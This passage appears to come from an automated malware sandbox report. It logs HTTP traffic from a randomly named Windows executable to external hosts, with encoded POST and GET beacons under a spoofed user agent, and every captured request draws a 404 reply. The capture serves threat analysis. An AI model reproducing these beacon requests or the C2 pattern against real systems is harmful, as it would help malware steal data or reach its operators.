                      Data Raw: 58 6e 37 30 5f 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 37 4d 4e 79 42 41 33 5a 41 48 51 6f 30 73 62 75 53 31 4f 31 32 4a 71 38 67 39 6e 4a 66 43 71 70 70 61 75 75 67 78 70 50 4e 64 63 74 57 72 55 70 67 36 6d 75 44 66 53 52 6c 46 50 6c 44 77 4f 4b 4d 44 49 63 51 78 33 2f 57 43 38 51 69 5a 46 64 6b 38 77 7a 56 57 44 44 72 44 6e 6a 62 4f 42 6e 2f 4a 63 76 6c 79 53 78 74 35 4c 5a 35 54 33 76 42 32 65 55 6c 6c 73 67 4c 50 4f 74 75 70 4d 6f 53 63 65 2f 70 32 34 58 48 50 6e 48 6c 30 30 6d 51 4f 61 53 68 77 36 52 54 48 6c 43 65 69 63 6a 48 53 52 34 71 38 71 44 34 39 32 4b 2f 68 4a 43 6f 34 48 79 51 4d 52 77 3d 3d
                      Data Ascii: Xn70_=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pc7MNyBA3ZAHQo0sbuS1O12Jq8g9nJfCqppauugxpPNdctWrUpg6muDfSRlFPlDwOKMDIcQx3/WC8QiZFdk8wzVWDDrDnjbOBn/JcvlySxt5LZ5T3vB2eUllsgLPOtupMoSce/p24XHPnHl00mQOaShw6RTHlCeicjHSR4q8qD492K/hJCo4HyQMRw==
                      Aug 23, 2024 08:26:39.647275925 CEST369INHTTP/1.1 404 Not Found
                      Server: nginx/1.26.1
                      Date: Fri, 23 Aug 2024 06:26:39 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.649732167.172.133.32806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:41.745754004 CEST1800OUTPOST /zctj/ HTTP/1.1
                      Host: www.onlytradez.club
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.onlytradez.club
                      Referer: http://www.onlytradez.club/zctj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 7a 4d 52 58 4e 41 30 2b 55 48 4b 6f 30 73 59 75 53 30 4f 31 32 41 71 38 34 78 6e 4a 61 31 71 72 52 61 68 72 30 78 68 64 6c 64 53 74 57 72 4d 5a 67 37 72 4f 43 4c 53 51 55 4d 50 6c 54 77 4f 4b 4d 44 49 65 34 78 67 37 43 43 76 41 69 61 45 64 6b 77 68 44 56 71 44 46 43 34 6e 6a 75 37 47 52 50 4a 63 4f 5a 79 51 43 46 35 4a 35 35 52 32 76 41 7a 65 55 34 39 73 6b 72 74 4f 75 79 54 4d 71 4f 63 64 72 41 30 6b 30 50 32 6d 52 78 30 71 78 51 46 44 47 51 41 38 57 2f 44 31 44 79 4c 65 6a 4c 62 50 64 69 33 2b 77 70 47 7a 4c 4c 54 4a 46 73 75 45 7a 78 6e 48 4a 36 72 64 4a 59 71 68 77 67 2f 67 59 50 57 33 35 36 78 6b 78 50 37 33 6e 72 4e 75 49 56 49 7a 33 69 63 35 32 2b 33 75 58 70 44 4f 2b 4b 2f 6a 6a 6e 54 6e 71 55 38 54 51 53 79 45 55 57 75 57 6e 75 75 47 47 66 7a 61 4b 41 46 56 74 61 6b 5a 76 48 6e 41 58 6a 53 34 2f 73 72 64 59 41 37 37 4a 45 39 32 4a 49 55 51 69 67 72 [TRUNCATED]
                      Data Ascii: Xn70_=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pczMRXNA0+UHKo0sYuS0O12Aq84xnJa1qrRahr0xhdldStWrMZg7rOCLSQUMPlTwOKMDIe4xg7CCvAiaEdkwhDVqDFC4nju7GRPJcOZyQCF5J55R2vAzeU49skrtOuyTMqOcdrA0k0P2mRx0qxQFDGQA8W/D1DyLejLbPdi3+wpGzLLTJFsuEzxnHJ6rdJYqhwg/gYPW356xkxP73nrNuIVIz3ic52+3uXpDO+K/jjnTnqU8TQSyEUWuWnuuGGfzaKAFVtakZvHnAXjS4/srdYA77JE92JIUQigrEIaknL6JT6HLM5cvSgtZtbftjaaXq3xK4VNL5qKPgDnpnslNk6VoL9FW8K13jRdC6cNYP6BCLPupGVZEPbaEIfmStVAFJtxOLl2N+Z/gsUJqBZUwTy/RB6oVDVzp5XTJGsKviUbeSMgDeFeTm6G1ZXt+5GpxBs+KBRxy/JQdMMnmGEfBgKseGdg1zDGJawaPHpOTh5gRZn/v4l2fC+ZPqait84UlQTrgypaz4ejzd5je9+aUeKdBqYcxXB3xByGqtWKIWI4cEovd91/SC5KYPKeFACHnm/klJUBspPjjLSpzcGMzZCGk4p0hsxxcYqFuiNFDDr1iRSNvE7lX8/j/XlT1oB5DumvOa6Wa9kQE6fCeujCw4pKrKTAlhpwT5WkmYBrRa0HVmE8neK7RAe4MNHQ/MST0GaYBmC3cadjVJNmJAjgtolCnKJibGsbSCpH39g6sHGVsAgNElnRPF/MlgA/dFUNhyhYGnlRF4RlvfhxbunV8+hGaQG/wUSemEvFalihok1lmvI8+jVFlSGDZzlt0zKE2s7PRoPTy6IVWKZ16m8MNvjZT+jfd8n9IUWN2SD/SC0c+GgvmxiKG1Itz05fU40/napVUn7jzNzqQL7yU1Ygvhk3+QYesyj6SrfNPGteanXM4u1d0mxZJdkvUVwTjkrjwaqe/WD [TRUNCATED]
                      Aug 23, 2024 08:26:42.181055069 CEST369INHTTP/1.1 404 Not Found
                      Server: nginx/1.26.1
                      Date: Fri, 23 Aug 2024 06:26:42 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.649733167.172.133.32806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:44.287750959 CEST506OUTGET /zctj/?Xn70_=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.onlytradez.club
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:26:44.745959997 CEST705INHTTP/1.1 404 Not Found
                      Server: nginx/1.26.1
                      Date: Fri, 23 Aug 2024 06:26:44 GMT
                      Content-Type: text/html
                      Content-Length: 555
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.649734206.119.82.116806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:50.219079971 CEST745OUTPOST /kyiu/ HTTP/1.1
                      Host: www.32wxd.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.32wxd.top
                      Referer: http://www.32wxd.top/kyiu/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 2f 32 67 4a 79 76 75 67 42 2f 42 65 43 4a 53 2f 6e 5a 2f 37 62 67 51 31 41 61 48 42 30 55 4e 72 39 69 33 58 71 6b 4e 36 6e 47 32 44 6b 5a 73 4a 42 2b 78 38 37 78 56 30 56 31 39 5a 4b 52 4d 79 4d 78 6b 2b 4a 41 73 4b 70 61 51 6f 33 4a 71 68 74 6e 7a 41 78 38 5a 30 62 4e 5a 30 52 32 48 33 68 65 75 48 32 67 6e 52 73 61 7a 48 4e 31 6b 68 39 76 52 4e 54 31 2b 38 4e 35 6a 73 31 46 5a 4f 55 52 37 2b 38 78 4e 56 68 44 48 4a 59 46 78 45 73 6c 6a 41 44 37 54 49 57 66 58 51 2b 53 48 6e 51 56 68 46 6c 73 65 63 4f 63 70 2b 76 68 4c 62 42 6b 4f 4a 35 54 79 45 69 65 46 6f 44 34 31
                      Data Ascii: Xn70_=aBuNv8bUDAAzG/2gJyvugB/BeCJS/nZ/7bgQ1AaHB0UNr9i3XqkN6nG2DkZsJB+x87xV0V19ZKRMyMxk+JAsKpaQo3JqhtnzAx8Z0bNZ0R2H3heuH2gnRsazHN1kh9vRNT1+8N5js1FZOUR7+8xNVhDHJYFxEsljAD7TIWfXQ+SHnQVhFlsecOcp+vhLbBkOJ5TyEieFoD41
                      Aug 23, 2024 08:26:51.116121054 CEST691INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:50 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.649735206.119.82.116806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:52.762989044 CEST769OUTPOST /kyiu/ HTTP/1.1
                      Host: www.32wxd.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.32wxd.top
                      Referer: http://www.32wxd.top/kyiu/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 38 4e 72 64 79 33 57 76 45 4e 35 6e 47 32 4c 45 5a 70 58 78 2b 41 38 37 38 32 30 55 4a 39 5a 4b 56 4d 79 4f 5a 6b 2f 36 6f 76 4c 35 61 57 30 33 4a 37 6c 74 6e 7a 41 78 38 5a 30 62 59 45 30 52 65 48 32 51 4f 75 56 44 41 6f 53 73 61 77 4e 74 31 6b 6c 39 75 57 4e 54 31 58 38 4d 6b 45 73 77 42 5a 4f 56 68 37 36 35 64 43 66 68 44 4e 58 6f 45 54 44 35 63 30 47 78 32 71 4b 6c 65 32 48 76 6a 69 72 47 55 37 5a 57 73 39 4f 65 38 72 2b 74 35 35 62 68 6b 6b 4c 35 72 79 57 31 53 69 6e 33 64 57 61 32 58 4b 63 33 38 67 73 6c 4a 46 58 34 38 36 4a 70 39 4c 7a 77 3d 3d
                      Data Ascii: Xn70_=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBC8Nrdy3WvEN5nG2LEZpXx+A87820UJ9ZKVMyOZk/6ovL5aW03J7ltnzAx8Z0bYE0ReH2QOuVDAoSsawNt1kl9uWNT1X8MkEswBZOVh765dCfhDNXoETD5c0Gx2qKle2HvjirGU7ZWs9Oe8r+t55bhkkL5ryW1Sin3dWa2XKc38gslJFX486Jp9Lzw==
                      Aug 23, 2024 08:26:53.682740927 CEST691INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:53 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.649736206.119.82.116806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:55.311536074 CEST1782OUTPOST /kyiu/ HTTP/1.1
                      Host: www.32wxd.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.32wxd.top
                      Referer: http://www.32wxd.top/kyiu/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 45 4e 72 4f 71 33 58 4f 45 4e 34 6e 47 32 49 45 5a 6f 58 78 2b 5a 38 37 6b 71 30 55 46 4c 5a 4a 39 4d 77 74 68 6b 34 4c 6f 76 46 35 61 57 2f 58 4a 72 68 74 6e 69 41 78 73 6a 30 62 49 45 30 52 65 48 32 53 6d 75 43 47 67 6f 55 73 61 7a 48 4e 31 67 68 39 76 78 4e 53 64 74 38 4d 67 2b 76 45 31 5a 4f 31 78 37 38 66 4a 43 5a 78 44 44 57 6f 45 31 44 35 5a 7a 47 78 72 56 4b 6d 44 62 48 73 2f 69 75 54 56 34 44 58 4e 6a 4e 39 4d 66 2b 73 55 65 55 55 38 42 4c 70 2f 4d 54 44 6d 73 73 58 42 44 65 68 2f 56 57 47 64 50 74 46 49 6f 4c 39 64 4c 64 70 67 5a 6c 78 6f 68 2f 62 6f 39 6f 45 68 37 69 6c 34 78 53 63 34 56 42 79 43 73 59 38 59 75 61 6b 38 59 74 37 36 4d 67 67 6f 5a 76 4c 73 50 62 4d 70 4c 63 6e 4f 53 74 39 36 4f 4a 6c 41 75 76 41 49 41 4d 77 59 4f 78 67 47 4b 35 56 46 36 66 62 6a 37 43 6f 37 76 4b 78 6a 35 44 53 36 51 77 4f 4b 54 57 61 45 70 65 4f 58 79 7a 67 54 53 [TRUNCATED]
                      Data Ascii: Xn70_=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBCENrOq3XOEN4nG2IEZoXx+Z87kq0UFLZJ9Mwthk4LovF5aW/XJrhtniAxsj0bIE0ReH2SmuCGgoUsazHN1gh9vxNSdt8Mg+vE1ZO1x78fJCZxDDWoE1D5ZzGxrVKmDbHs/iuTV4DXNjN9Mf+sUeUU8BLp/MTDmssXBDeh/VWGdPtFIoL9dLdpgZlxoh/bo9oEh7il4xSc4VByCsY8Yuak8Yt76MggoZvLsPbMpLcnOSt96OJlAuvAIAMwYOxgGK5VF6fbj7Co7vKxj5DS6QwOKTWaEpeOXyzgTShDuCPPbglQRptSwY39lEwIrRRbeScI5d6J7iENUl6/MEKxnGwG/szvukCkoI1IKLaqpiXBWUrm0S3eT2rXQYGPXeXlGSZBeAy9UAMSgMFDABeM+VhuiuFN/rFzgrhvNV1H7wl0oHy7Ar1FLDBpQtzdSvV8Bd948iskc+3HdCABiPdJWup0U2qNBwKv0y5NsjT0uNlNIoHMebyd3H2833vg2z4M2x6qjC4jEWhVlDbDmB4WPOyDM9v4NLRRZpWImXK/VbVauQFrGzvoXnj/P1x9WtjB6+ezjgK/gnV6kMAQ1VMUqOAprEVf2F8M+KDxmGt6QqNYwEIgoVNvpHOPynKHwSv68tjyWrA0qeZZoC7Mvn5MAIxQUSK2r47AcTHkIObnKmnuOY29qxi2MziEeyprpq/N6ewnUtw/owK1SvroX4LFmB/+JsJDiE076g8nb9WrmqkoMkmzu3x2H8QR0Vaf+8KStzI6sj764BnLXD2k9haKfw6yliryUZCIX+DcJN7Rc3TYUI05PWC/2R922lhhdLrs6isWCDT1H0spTkU5dpXu/wBuCINzROqVBkYgNoniSVmT1Q4nGL8YxeHKAsI3Gl/7YCKoqrUfZucTS11Q6by42jIXPicYiGRFW65UGg5suG3aa+XnQ8aANBHSvaY31/9OqSrKjeG2 [TRUNCATED]
                      Aug 23, 2024 08:26:56.196719885 CEST691INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:56 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.649737206.119.82.116806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:57.854135990 CEST500OUTGET /kyiu/?Xn70_=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.32wxd.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:26:58.733803034 CEST691INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:58 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
